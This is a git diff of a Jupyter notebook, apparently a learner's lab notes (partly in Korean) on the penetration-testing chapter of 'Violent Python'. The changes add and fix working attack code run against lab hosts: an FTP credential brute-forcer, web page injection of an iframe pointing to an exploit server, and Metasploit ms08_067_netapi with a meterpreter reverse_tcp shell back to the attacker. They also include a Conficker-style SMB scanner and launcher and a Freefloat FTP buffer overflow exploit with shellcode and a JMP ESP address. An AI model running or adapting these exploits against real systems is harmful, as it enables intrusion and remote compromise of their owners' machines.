Upgrade Chapter2 at end of lecture.

--- a/books/violent_python/ch02_Penetration_test.ipynb
+++ b/books/violent_python/ch02_Penetration_test.ipynb
@@ -1,7 +1,7 @@
 {
  "metadata": {
   "name": "",
-  "signature": "sha256:80c1194aff970fb368b69030d117609a2a4c88c81a25fec2248a96d847263848"
+  "signature": "sha256:0555e13ff4dd0a4f9962124b739ee7ec52f1034d6eefd594d4d3cb95c4fa1826"
  },
  "nbformat": 3,
  "nbformat_minor": 0,
@@ -3158,6 +3158,97 @@
      "cell_type": "code",
      "collapsed": false,
      "input": [
+      "line = 'admin:toor'"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [],
+     "prompt_number": 3
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "line"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "metadata": {},
+       "output_type": "pyout",
+       "prompt_number": 4,
+       "text": [
+        "'admin:toor'"
+       ]
+      }
+     ],
+     "prompt_number": 4
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "line.split(':')"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "metadata": {},
+       "output_type": "pyout",
+       "prompt_number": 5,
+       "text": [
+        "['admin', 'toor']"
+       ]
+      }
+     ],
+     "prompt_number": 5
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "line.split(':')[0]"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "metadata": {},
+       "output_type": "pyout",
+       "prompt_number": 6,
+       "text": [
+        "'admin'"
+       ]
+      }
+     ],
+     "prompt_number": 6
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "line.split(':')[1]"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "metadata": {},
+       "output_type": "pyout",
+       "prompt_number": 7,
+       "text": [
+        "'toor'"
+       ]
+      }
+     ],
+     "prompt_number": 7
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
       "import ftplib\n",
       "def bruteLogin(hostname, passwdFile):\n",
       "    with open(passwdFile, 'r') as pF:\n",
@@ -3177,7 +3268,7 @@
       "        print '\\n[-] Could not brute force FTP credentials.'\n",
       "        return(None, None)\n",
       "\n",
-      "host = '192.168.10.94'\n",
+      "host = '192.168.32.94'\n",
       "passWdFile = 'ch02/userpass.txt'\n",
       "bruteLogin(host, passWdFile)\n",
       "        "
@@ -3206,6 +3297,15 @@
       }
      ],
      "prompt_number": 14
+    },
+    {
+     "cell_type": "markdown",
+     "metadata": {},
+     "source": [
+      "#### BackTrack \uc8fc\uc18c\n",
+      "\n",
+      "- Bridge: 192.168.32.94"
+     ]
     },
     {
      "cell_type": "markdown",
@@ -3240,6 +3340,55 @@
      "cell_type": "code",
      "collapsed": false,
      "input": [
+      "s = 'Hello World!'"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [],
+     "prompt_number": 8
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "print s"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "output_type": "stream",
+       "stream": "stdout",
+       "text": [
+        "Hello World!\n"
+       ]
+      }
+     ],
+     "prompt_number": 9
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "print s.lower()"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "output_type": "stream",
+       "stream": "stdout",
+       "text": [
+        "hello world!\n"
+       ]
+      }
+     ],
+     "prompt_number": 10
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
       "# -*- coding: utf-8\n",
       "\n",
       "import ftplib\n",
@@ -3263,9 +3412,9 @@
       "            retList.append(fileName)\n",
       "    return retList\n",
       "\n",
-      "host = '192.168.10.94'\n",
-      "userName = 'root'\n",
-      "passWord = 'toor'\n",
+      "host = '192.168.32.94'\n",
+      "userName = 'violent'\n",
+      "passWord = 'violent'\n",
       "\n",
       "ftp = ftplib.FTP(host)\n",
       "ftp.login(userName, passWord)\n",
@@ -3349,6 +3498,45 @@
      ]
     },
     {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "%%writefile ch02/iframe.html\n",
+      "<html>\n",
+      "<head>\n",
+      "<body>\n",
+      "    <p>Hellow e ri python!</p>\n",
+      "    <iframe src=\"http://www.naver.com\", width=500, height= 500 >\n",
+      "\n",
+      "</body>\n",
+      "</head>\n",
+      "</html>"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "output_type": "stream",
+       "stream": "stdout",
+       "text": [
+        "Writing ch02/iframe.html\n"
+       ]
+      }
+     ],
+     "prompt_number": 1
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "!open ch02/iframe.html"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [],
+     "prompt_number": 2
+    },
+    {
      "cell_type": "markdown",
      "metadata": {},
      "source": [
@@ -3363,6 +3551,22 @@
       "\n",
       "- /home/violent \ub8e8\ud2b8\uac00 \uae30\ubcf8 \ub514\ub809\ud1a0\ub9ac\ub2e4. \uc5ec\uae30\uc5d0 index.html\uc744 \uc62c\ub824\uc57c \ub41c\ub2e4. secure_chroot_dir\uc5d0 \uc18d\uc9c0 \ub9d0\uac83!\n"
      ]
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "redirect = '<iframe src=' +\\\n",
+      "            '\"http://' +\\\n",
+      "            host +\\\n",
+      "            ':' +\\\n",
+      "            str(port) +\\\n",
+      "            '/exploit\"></iframe>'\n",
+      "            <iframe src='192.168.32.94:7777'></iframe>"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": []
     },
     {
      "cell_type": "code",
@@ -3565,7 +3769,7 @@
       "        '.htm' in fn or \\\n",
       "        '.asp' in fn:\n",
       "            print '[+] Found default page: ' + fileName\n",
-      "        retList.append(fileName)\n",
+      "            retList.append(fileName)\n",
       "    return retList\n",
       "\n",
       "def injectPage(ftp, page, redirect):\n",
@@ -3588,7 +3792,7 @@
       "def main():\n",
       "    parser = optparse.OptionParser('usage%prog ' +\\\n",
       "                                   '-H <target host[s]> ' +\\\n",
-      "                                   '-r <redirect page>' +\\\n",
+      "                                   '-r <redirect page> ' +\\\n",
       "                                   '[-f <userpass file>]')\n",
       "    parser.add_option('-H', dest='tgtHosts', type='string', \\\n",
       "                      help='specify target host')\n",
@@ -3631,7 +3835,7 @@
        "output_type": "stream",
        "stream": "stderr",
        "text": [
-        "Usage: usage-c -H <target host[s]> -r <redirect page>[-f <userpass file>]\n",
+        "Usage: usage-c -H <target host[s]> -r <redirect page> [-f <userpass file>]\n",
         "\n",
         "-c: error: no such option: --pylab\n"
        ]
@@ -3653,7 +3857,17 @@
        ]
       }
      ],
-     "prompt_number": 35
+     "prompt_number": 3
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "!python ftp_final.py -H 192.168.32.94 -r \"<iframe src='http://www.naver.com', width=600, height=1000></ifarme>\" -f ch02/userpass.txt"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": []
     },
     {
      "cell_type": "markdown",
@@ -3728,11 +3942,18 @@
      "metadata": {},
      "source": [
       "    use exploit/windows/smb/ms08_067_netapi\n",
-      "    set RHOST 172.16.190.133\n",
+      "    set RHOST 192.168.32.95\n",
       "    set PAYLOAD windows/meterpreter/reverse_tcp\n",
-      "    set LHOST 172.16.190.132\n",
+      "    set LHOST 192.168.32.94\n",
       "    set LPORT 7777\n",
-      "    exploit -j -z"
+      "    exploit -j -z\n",
+      "    \n",
+      "-j(\uc791\uc5c5\uc758 \ucee8\ud14d\uc2a4\ud2b8\uc5d0\uc11c)\uc640 -z(\uc791\uc5c5\uacfc \uc989\uc2dc \uc0c1\ud638\uc791\uc6a9\ud558\uc9c0 \ub9d0\uace0) \uc635\uc158\uc744 \uc0ac\uc6a9\ud558\uc5ec \ucef4\ud4e8\ud130\ub97c \uacf5\uaca9\ud558\ub77c\ub294 \uc9c0\uc2dc\n",
+      "\n",
+      "\n",
+      "- \\-j Run in the context of a job.\n",
+      "- \\-z Do not interact with the session after successful exploitation.\n",
+      "- \uc2a4\ud06c\ub9bd\ud2b8\ub294 \uc5ec\ub7ec \uac1c\uc758 \ud638\uc2a4\ud2b8\ub97c \ub3d9\uc2dc\uc5d0 \uacf5\uaca9\ud560 \uac83\uc774\uae30 \ub54c\ubb38\uc5d0, \ubaa8\ub450 \ub3d9\uc2dc\uc5d0 \uc0c1\ud638\uc791\uc6a9\ud560 \uc218 \uc5c6\uc73c\ubbc0\ub85c \uc774\ub4e4 \uc635\uc158\uc774 \ud544\uc218"
      ]
     },
     {
@@ -3946,6 +4167,8 @@
       "3. -j(\uc791\uc5c5\uc758 \ucee8\ud14d\uc2a4\ud2b8\uc5d0\uc11c)\uc640 -z(\uc791\uc5c5\uacfc \uc989\uc2dc \uc0c1\ud638\uc791\uc6a9\ud558\uc9c0 \ub9d0\uace0) \uc635\uc158\uc744 \uc0ac\uc6a9\ud558\uc5ec \ucef4\ud4e8\ud130\ub97c \uacf5\uaca9\ud558\ub77c\ub294 \uc9c0\uc2dc\n",
       "\n",
       "\n",
+      "- \\-j Run in the context of a job.\n",
+      "- \\-z Do not interact with the session after successful exploitation.\n",
       "- \uc2a4\ud06c\ub9bd\ud2b8\ub294 \uc5ec\ub7ec \uac1c\uc758 \ud638\uc2a4\ud2b8\ub97c \ub3d9\uc2dc\uc5d0 \uacf5\uaca9\ud560 \uac83\uc774\uae30 \ub54c\ubb38\uc5d0, \ubaa8\ub450 \ub3d9\uc2dc\uc5d0 \uc0c1\ud638\uc791\uc6a9\ud560 \uc218 \uc5c6\uc73c\ubbc0\ub85c \uc774\ub4e4 \uc635\uc158\uc774 \ud544\uc218"
      ]
     },
@@ -4094,31 +4317,39 @@
      "outputs": [
       {
        "output_type": "stream",
-       "stream": "stderr",
+       "stream": "stdout",
        "text": [
-        "Usage: [-]Usage-c -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]\n",
-        "\n",
-        "-c: error: no such option: -f\n"
+        "Writing ch02/conficker.py\n"
        ]
-      },
+      }
+     ],
+     "prompt_number": 4
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "!python ch02/conficker.py -H 192.168.32.95 -l 192.168.32.94 -p 7777 -F ch02/pass.txt"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
       {
-       "ename": "SystemExit",
-       "evalue": "2",
-       "output_type": "pyerr",
-       "traceback": [
-        "An exception has occurred, use %tb to see the full traceback.\n",
-        "\u001b[0;31mSystemExit\u001b[0m\u001b[0;31m:\u001b[0m 2\n"
+       "output_type": "stream",
+       "stream": "stdout",
+       "text": [
+        "[+] Found Target Host: 192.168.32.95\r\n"
        ]
       },
       {
        "output_type": "stream",
-       "stream": "stderr",
+       "stream": "stdout",
        "text": [
-        "To exit: use 'exit', 'quit', or Ctrl-D.\n"
+        "sh: msfconsole: command not found\r\n"
        ]
       }
      ],
-     "prompt_number": 41
+     "prompt_number": 5
     },
     {
      "cell_type": "code",
@@ -4144,6 +4375,112 @@
       }
      ],
      "prompt_number": 120
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "def findTgts(subNet):\n",
+      "    nmScan = nmap.PortScanner()\n",
+      "    nmScan.scan(subNet, '445')\n",
+      "    tgtHosts = []\n",
+      "    for host in nmScan.all_hosts():\n",
+      "        if nmScan[host].has_tcp(445):\n",
+      "            state = nmScan[host]['tcp'][445]['state']\n",
+      "            if state == 'open':\n",
+      "                print '[+] Found Target Host: ' + host\n",
+      "                tgtHosts.append(host)\n",
+      "    return tgtHosts"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [],
+     "prompt_number": 6
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "import nmap"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [],
+     "prompt_number": 7
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "findTgts('192.168.32.0')"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "metadata": {},
+       "output_type": "pyout",
+       "prompt_number": 9,
+       "text": [
+        "[]"
+       ]
+      }
+     ],
+     "prompt_number": 9
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "nmScan = nmap.PortScanner()"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [],
+     "prompt_number": 10
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "nmScan.scan(['192.168.32.95', '192.168.32.94'], '445')"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "Wrong type for [hosts], should be a string [was <type 'list'>]",
+       "output_type": "pyerr",
+       "traceback": [
+        "\u001b[0;31m---------------------------------------------------------------------------\u001b[0m\n\u001b[0;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[0;32m<ipython-input-13-8be6e79e5788>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m()\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mnmScan\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mscan\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;34m'192.168.32.95'\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m'192.168.32.94'\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m'445'\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[0;32m/Users/re4lfl0w/Library/Enthought/Canopy_64bit/User/lib/python2.7/site-packages/nmap/nmap.pyc\u001b[0m in \u001b[0;36mscan\u001b[0;34m(self, hosts, ports, arguments)\u001b[0m\n\u001b[1;32m    253\u001b[0m         \"\"\"\n\u001b[1;32m    254\u001b[0m         \u001b[0;32mif\u001b[0m \u001b[0msys\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mversion_info\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m==\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m--> 255\u001b[0;31m             \u001b[0;32massert\u001b[0m \u001b[0mtype\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mhosts\u001b[0m\u001b[0;34m)\u001b[0m \u001b[0;32min\u001b[0m \u001b[0;34m(\u001b[0m\u001b[0mstr\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0municode\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m'Wrong type for [hosts], should be a string [was {0}]'\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mformat\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mtype\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mhosts\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m    256\u001b[0m         \u001b[0;32melse\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m    257\u001b[0m             \u001b[0;32massert\u001b[0m \u001b[0mtype\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mhosts\u001b[0m\u001b[0;34m)\u001b[0m \u001b[0;32mis\u001b[0m \u001b[0mstr\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m'Wrong type for [hosts], should be a string [was {0}]'\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mformat\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mtype\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mhosts\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
+        "\u001b[0;31mAssertionError\u001b[0m: Wrong type for [hosts], should be a string [was <type 'list'>]"
+       ]
+      }
+     ],
+     "prompt_number": 13
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "nmScan.all_hosts()"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "metadata": {},
+       "output_type": "pyout",
+       "prompt_number": 12,
+       "text": [
+        "[u'192.168.32.95']"
+       ]
+      }
+     ],
+     "prompt_number": 12
     },
     {
      "cell_type": "code",
@@ -4402,7 +4739,7 @@
       "    \n",
       "print '[*] Sending ' + len(crash) + ' ' + command + 'byte crash...'\n",
       "s.send('USER anonymous\\r\\n')\n",
-      "s.rect(1024)\n",
+      "s.recv(1024)\n",
       "s.send('PASS \\r\\n')\n",
       "s.recv(1024)\n",
       "s.send('RETR' + ' ' + crash + '\\r\\n')\n",
@@ -4435,6 +4772,7 @@
      "cell_type": "code",
      "collapsed": false,
      "input": [
+      "%%writefile ch02/freefloat2-overflow.py\n",
       "import socket\n",
       "import sys\n",
       "import time\n",
@@ -4484,7 +4822,7 @@
       "\"\\xba\\x1e\\x53\\x31\")\n",
       "\n",
       "overflow = '\\x41' * 246\n",
-      "ret = struct.pack('<L', 0x7C874413) # 7C8744313 JMP ESP kernel32.dll\n",
+      "ret = struct.pack('<L', 0x7c8369f0) # 7C8744313 JMP ESP kernel32.dll\n",
       "padding = '\\x90' * 150\n",
       "crash = overflow + ret + padding + shellcode\n",
       "\n",
@@ -4498,13 +4836,12 @@
       "    s.connect((target, 21))\n",
       "except:\n",
       "    print '[-] Connection to ' + target + ' failed!'\n",
-      "    sys.exit(0)\n",
       "\n",
-      "print '[*] Sending ' + len(crash) + ' ' + command + ' byte crash...'\n",
+      "print '[*] Sending ' + str(len(crash)) + ' ' + command + ' byte crash...'\n",
       "s.send('USER anonymous\\r\\n')\n",
-      "s.recv(1024)\n",
+      "print s.recv(1024)\n",
       "s.send('PASS \\r\\n')\n",
-      "s.recv(1024)\n",
+      "print s.recv(1024)\n",
       "s.send(command + ' ' + crash + '\\r\\n')\n",
       "time.sleep(4)"
      ],
@@ -4515,37 +4852,46 @@
        "output_type": "stream",
        "stream": "stdout",
        "text": [
-        "[*] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow\n",
-        "[*] Author: Craig Freyman (@cd1zz)\n",
-        "[*] Connecting to -f\n",
-        "[-] Connection to -f failed!"
+        "Overwriting ch02/freefloat2-overflow.py\n"
        ]
-      },
+      }
+     ],
+     "prompt_number": 18
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
+      "!python ch02/freefloat2-overflow.py 192.168.32.95 PWND"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
       {
        "output_type": "stream",
        "stream": "stdout",
        "text": [
-        "\n"
-       ]
-      },
-      {
-       "ename": "SystemExit",
-       "evalue": "0",
-       "output_type": "pyerr",
-       "traceback": [
-        "An exception has occurred, use %tb to see the full traceback.\n",
-        "\u001b[0;31mSystemExit\u001b[0m\u001b[0;31m:\u001b[0m 0\n"
-       ]
-      },
-      {
-       "output_type": "stream",
-       "stream": "stderr",
-       "text": [
-        "To exit: use 'exit', 'quit', or Ctrl-D.\n"
+        "[*] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow\r\n",
+        "[*] Author: Craig Freyman (@cd1zz)\r\n",
+        "[*] Connecting to 192.168.32.95\r\n",
+        "[*] Sending 768 PWND byte crash...\r\n"
        ]
       }
      ],
-     "prompt_number": 69
+     "prompt_number": 19
+    },
+    {
+     "cell_type": "markdown",
+     "metadata": {},
+     "source": [
+      "#### findjmp\n",
+      "\n",
+      "- findjmp.exe kernel32.dll esp\n",
+      "- esp\ub85c jmp \ud560 \uc218 \uc788\ub294 \uba54\ubaa8\ub9ac \uc8fc\uc18c\ub97c \ucc3e\uc544\uc900\ub2e4.\n",
+      "- ret\ub97c jmp esp \ub85c \ubc14\uafd4\uc57c \ub418\ub294\ub370 \uc6d0\uaca9\uc5d0\uc11c 1\ubc88\uc5d0 \uc131\uacf5\ud558\ub824\uba74 \uc5b4\ub5bb\uac8c \ud574\uc57c\ub418\uc9c0?\n",
+      "\n",
+      "<img src=\"files/images/findjmp.png\" />"
+     ]
     },
     {
      "cell_type": "markdown",
